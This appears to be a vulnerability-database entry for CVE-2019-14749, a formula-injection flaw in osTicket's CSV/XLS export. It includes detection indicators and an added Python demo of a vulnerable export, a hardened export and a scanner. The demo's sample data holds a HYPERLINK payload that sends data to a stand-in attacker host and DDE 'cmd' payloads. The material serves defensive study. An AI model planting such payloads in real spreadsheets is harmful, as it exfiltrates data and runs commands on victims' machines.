CVE-2019-14749
Published 2019-08-07
Priority P2 · 62 · High 8.8 (CVSS 3.0): AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Exploit: public PoC indexed (see references)
EPSS: 9.61% (94.9th percentile)
An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. CSV (aka Formula) injection exists in the export spreadsheets functionality. The spreadsheets are generated dynamically from unvalidated, unfiltered user input in the Name and Internal Notes fields of the Users tab and the Issue Summary field of the Tickets tab. Other agents can download this data as a .csv or .xls file, which is then opened in a spreadsheet application such as Excel or OpenOffice Calc, so cells in the exported spreadsheet can carry input from an untrusted source. The end user who opens the exported spreadsheet is the one affected.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| osticket | osticket | < 1.10.7 | 1.10.7 |
| osticket | osticket | >= 1.12 < 1.12.1 | 1.12.1 |
Detection & IOCs (extracted from sources)
- CSV/Formula injection payload inserted into the 'Name' and 'Internal Notes' fields in the Users tab, and the 'Issue Summary' field in the Tickets tab of osTicket.
- Monitor osTicket export functionality for downloads of .csv or .xls files containing formula-prefixed cell values (starting with =, +, -, @, or a tab/carriage-return) that originate from user-controlled fields. Quoting alone is not a safe indicator: spreadsheet applications still evaluate a quoted cell that begins with a formula trigger.
- Non-agent (regular) users can also inject formula payloads via the name-edit feature, not only agents; monitor all user profile update requests for formula-injection patterns.
- Review the osTicket patch commit (linked in the references) for the exact sanitization logic before building input-validation signatures; the commit, not this summary, is the authoritative description of what the fix escapes.
- The vulnerability affects osTicket versions before 1.10.7 and 1.12.x before 1.12.1. The source describes the attacker as an authenticated agent or regular user who plants the payload, with a separate agent triggering it by exporting the spreadsheet. Note that NVD scores the vector PR:N, so do not treat authentication as a hard prerequisite when building detections.
- The formula payload executes client-side only when the exported .csv or .xls file is opened in a spreadsheet application (e.g., Excel, OpenOffice Calc). The osTicket server itself is not compromised; the end user opening the file is the victim.
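The export flaw described on this page and the detection check in the list above can both be shown with a short script. This is an added illustration, not osTicket code and not the sanitization the osTicket patch commit applies: `export_vulnerable` writes user-controlled fields to the spreadsheet unchanged (the behaviour the advisory describes), `export_hardened` applies a generic apostrophe-prefix mitigation, and `find_formula_cells` is the scanner one would run over downloaded .csv exports. The ticket rows, names and payload strings are constructed sample data.

```python
"""Formula (CSV) injection: vulnerable export, hardened export, and a scanner
for exported files. Added example, not osTicket code; all sample rows and
payloads below are constructed."""
import csv
import io

# A spreadsheet application treats a cell beginning with one of these as a
# formula. Quoting the field in the CSV does not help: Excel and Calc still
# evaluate a quoted "=1+1". Leading spaces are stripped first as a
# conservative choice; flagging a harmless value only costs an apostrophe.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(cell: str) -> bool:
    """True when a spreadsheet would evaluate this cell instead of showing it."""
    stripped = cell.lstrip(" ")
    return stripped != "" and stripped[0] in FORMULA_TRIGGERS


def neutralize_cell(cell: str) -> str:
    """Generic mitigation (assumption: not the osTicket patch's logic). Forces
    text interpretation by prefixing formula-like values with an apostrophe;
    the original value is preserved, the apostrophe stays visible in some
    applications."""
    return "'" + cell if is_formula_like(cell) else cell


def write_csv(rows, sanitize) -> str:
    """Serialise rows as CSV, passing every cell through `sanitize` first."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([sanitize(str(value)) for value in row])
    return buf.getvalue()


def export_vulnerable(rows) -> str:
    """Mirrors the advisory: user-controlled fields are exported unchanged."""
    return write_csv(rows, lambda value: value)


def export_hardened(rows) -> str:
    """Same export with formula-like cells neutralised before serialisation."""
    return write_csv(rows, neutralize_cell)


def find_formula_cells(csv_text: str):
    """Detection: (row, column, value) for every formula-like cell in an
    exported CSV, the check the IOC list suggests running on downloads."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                hits.append((r, c, cell))
    return hits


# Constructed sample export: header plus four tickets. One Name, two Issue
# Summary values and two Internal Notes values carry payloads of the kind
# used against spreadsheet export features (hyperlink exfiltration and DDE).
HEADER = ["Ticket", "Name", "Issue Summary", "Internal Notes"]
SAMPLE_ROWS = [
    HEADER,
    ["100001", "Alice Example", "Printer offline on floor 3", ""],
    ["100002", '=HYPERLINK("http://attacker.example/?"&A1,"Click")',
     "Password reset", ""],
    ["100003", "Bob Example", "=cmd|' /C calc'!A0", "  -2+3+cmd|' /C calc'!A0"],
    ["100004", "Carol Example", "@SUM(1+9)*cmd|' /C calc'!A0", "+1-1"],
]


def demo():
    """Return (formula cells in vulnerable export, formula cells in hardened export)."""
    vulnerable = export_vulnerable(SAMPLE_ROWS)
    hardened = export_hardened(SAMPLE_ROWS)
    return len(find_formula_cells(vulnerable)), len(find_formula_cells(hardened))


if __name__ == "__main__":
    before, after = demo()
    print(f"formula-like cells: vulnerable export={before}, hardened export={after}")
    for hit in find_formula_cells(export_vulnerable(SAMPLE_ROWS)):
        print("  flagged:", hit)
```

Run the file directly to see the five flagged cells in the vulnerable export and zero in the hardened one. The scanner is deliberately wider than the `=, +, -, @` list in the IOC above, since tab and carriage-return prefixes are also evaluated by spreadsheet applications; when used on real osTicket exports, expect benign hits on values such as negative numbers or phone numbers written with a leading plus sign, and triage those by the field they came from.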
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | CVSS 3.0 | 8.8 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| NVD | CVSS 2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
No detection rules found.
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/154004/osTicket-1.12-Formula-Injection.html
- https://github.com/osTicket/osTicket/commit/99818486c5b1d8aa445cee232825418d6834f249
- https://github.com/osTicket/osTicket/releases/tag/v1.10.7
- https://github.com/osTicket/osTicket/releases/tag/v1.12.1
- https://www.exploit-db.com/exploits/47225